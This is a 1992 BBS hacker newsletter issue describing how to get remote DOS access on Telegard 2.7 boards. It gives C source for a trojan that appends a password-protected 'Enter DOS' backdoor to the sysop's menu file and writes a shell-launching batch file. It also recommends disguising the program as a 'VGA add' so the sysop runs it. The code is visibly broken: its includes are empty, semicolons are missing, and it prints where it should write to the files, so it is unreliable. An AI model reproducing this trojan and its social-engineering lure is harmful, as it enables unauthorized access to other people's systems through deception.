�����������������������������������������������������������������������������ͻ � ����������������������� �� � ����� ����� ������������������������������ � � ������������������������� �� � � � ����� ������������������������������ � � ��������������������������� �� � ����� � ������������������������������ � � ����������������������������� �� � � ����� ������������������������������ � �����������������������������������������������������������������������������͹ � Vaginal and Anal Secretions Newsletter #0053 � �����������������������������������������������������������������������������Ķ � Date Released : [07/05/92] Author: Right Guard � �����������������������������������������������������������������������������Ķ � How To Properly And Easily Access DOS Through Telegard 2.7 � �����������������������������������������������������������������������������Ľ How to properly and easily access DOS through Telegard 2.7 ---------------------------------------------------------- Well we all know the weakest side of Telegard, don't we? The whole menu system can be easily accessed and worked with in order to perform simple access into Dos. If you just take a look at a Telegard menus found in the \telegard\menus\ directory (or which- ever directory they are located in), you will see that they are all formed pretty easily by listing the commands used in the menu in order. Here is the personal menu used in Telegard, I will go about instructing you on how to modify this menu and easily access DOS. Here is the default setting for the PERSONAL.MNU: NOTE: ----- *** This is exactly how it appears in Telegard 2.7 without *** *** modification. ***  ---  ^4Time Left: [^3@T^4] (^0?^4=^0Help^4)@M^4Personal Data Menu ^2:^3 s10 MAIN 0 4 4 0 5 (A)ddress - Change your address (A)ddress A s10 OP 1 (B)irthday - Change your date of birth (B)irthday B s10 OP 2 (C)ity & State - Change your city and state (C)ity & State C s10 OP 4 (D)efine Colors - Define your personal ANSI color setup (D)efine Colors D s10 OP 21 (G)oodbye - Log off and hang up with optional comment to the SysOp (G)oodbye G -/ goodbye (/G)oodbye - Log off and hang up immediately (/G)oodbye /G s20 HI (M)ailbox Status - Set mailbox open/closed, or forward your mail (M)ailbox Status M s10 OP 15 (P)hone Number - Change your telephone number (P)hone Number P s10 OP 8 (Q)uit to Main - Return to the main menu (Q)uit to Main Q -\ main (S)creen Size - Change the number of rows & columns on your screen (S)creen Size S s10 OP 11 (T)ype of Computer - Change your computer type (T)ype of Computer T s10 OP 5 (W)rite Macros - Write user-defined macros for online use (W)rite Macros W s20 OM (X)pert Toggle - Toggle between novice and expert menus (X)pert Toggle X s10 OP 22 (Z)ip Code - Change your postal zip code (Z)ip Code Z s10 OP 14 ($)Password - Change your logon password ($)Password $ s10 OP 9 (1)Set Video Type - Select ANSI, AVATAR, or TTY (plain) video output (1)Set Video Type 1 s10 OP 16 (2)Toggle Color - Toggle color on/off (does *NOT* affect ANSI setting) (2)Toggle Color 2 s10 OP 17 (3)Toggle Pause - Toggle pause after full screen on/off (3)Toggle Pause 3 s10 OP 18 (4)Toggle Input - Toggle between full line and one-key input (4)Toggle Input 4 s10 OP 19 (5)Toggle Clear - Toggle screen clear before displaying message on/off (5)Toggle Clear 5 s10 OP 20 (6)AVATAR Adjust - Toggle AVATAR color adjustment on/off (6)AVATAR Adjust 6 s10 OP 25 (*)SysOp Menu - Go to the SysOp menu (*)SysOp Menu * s200 -/ sysop Our main objective regarding this file is accessing it, modify- ing it, and then accessing DOS remotely. I have constructed in C++ a program or utility to do so. I will explain the source as we go along: /* Compiler Directives */ #include #include main () { /* Define Files */ FILE *per_mnu FILE *run_me /* Open File (PERSONAL.MNU) */ per_mnu = fopen( "c:\telegard\menus\personal.mnu", "a" ); /* If the file isn't found abort */ if ( NULL == per_mnu ) abort() /* Write to the file if it exists */ printf("[/E]nter DOS"); printf("[/E]nter DOS"); printf("/E"); printf("s10"); printf("-$"); printf("SYSOP;PW?:;No, the PW is SYSOP!"); printf("H"); printf(""); printf("[/E]nter DOS"); printf("[/E]nter DOS"); printf("/E"); printf("s10"); printf("D-"); printf("c:\telegard\runme.bat"); printf("H"); /* Closes file (PERSONAL.MNU) fclose( per_mnu ); /* In order to access do you need to have a file that does the same as REMOTE.BAT. Since we are not sure if the sys- op has deleted the REMOTE.BAT file for security reasons we must create one which does the same thing as the REMOTE.BAT file. */ /* Open File (RUNME.BAT) */ run_me = fopen( "c:\telegard\runme.bat", "w"); /* Write to RUNME.BAT */ printf("prompt $t$_$p$g$"); printf("command"); printf("ctty con"); printf("c:"); printf("cd\"); printf("cd\telegard\"); printf("exit"); /* Close file (RUNME.BAT) */ fclose( run_me ); This program writes to the bottom of PERSONAL.MNU and lets anyone with access higher than 10 access the lame sysops DOS. You can compile this in Borland C++ and rename the exe to some- thing like VGA_ADD.EXE and tell the sysop that you made a really cool VGA add for his board and he should check it out at once. He will run it, nothing will happen, and he will E-Mail you back telling you that your add didn't work and that you should re-pro- gram it... You call at 3 AM in the morning or even at 10 PM (if thats passed the idiotic sysops bedtime ) and access DOS and do whatever you want. Well I hope this article somewhat scares Telegard sysops and teaches them to have more security. If you run Telegard 2.7 and would still like to keep it, I suggest you rename your MENUS directory to something that no one could guess. The only catch to this C++ program is that you must know what dir- ectory the sysop has his menus in. It should not be to hard to figure out. One way to figure out where the sysops menu files are stored is by saying at the File Menu "!". Usually that is file area stats and it will usually tell you what directory the files in that area are stored. It might be something like c:\tg\utilfile\. You can conclude from that, that the menus are probably are in c:\tg\menus\ directory. Once you know the directory the menus are in you modify it in the C++ program supplied and compile it. You should have no errors in the compilation of the C program. Well I hope I helped someone out there with Telegard, whether it be warning a SysOp or whatever. Watch out Telegard can be deadly!! ��������[ VaS DiSTRiBuTioN SiTeS ]�������� �����������������������������������������������������������������������������ͻ � BBS Name Number Baud Sysop Title � �����������������������������������������������������������������������������Ķ � LiVe WiRE BBS (313)464-1470 14.4 Studmuffin World HQ � � PoT BBS (313)462-1906 24oo Phreak_Accident World HQ � � TcH BBS (713)373-4031 14.4 One Meg Cacher Dist. #1 � � Floating Pancreas (305)551-0311 14.4 Majestic Cockster Dist. #2 � � Midian BBS (703)790-8048 14.4 The Raging Golemn Dist. #3 � �����������������������������������������������������������������������������ͼ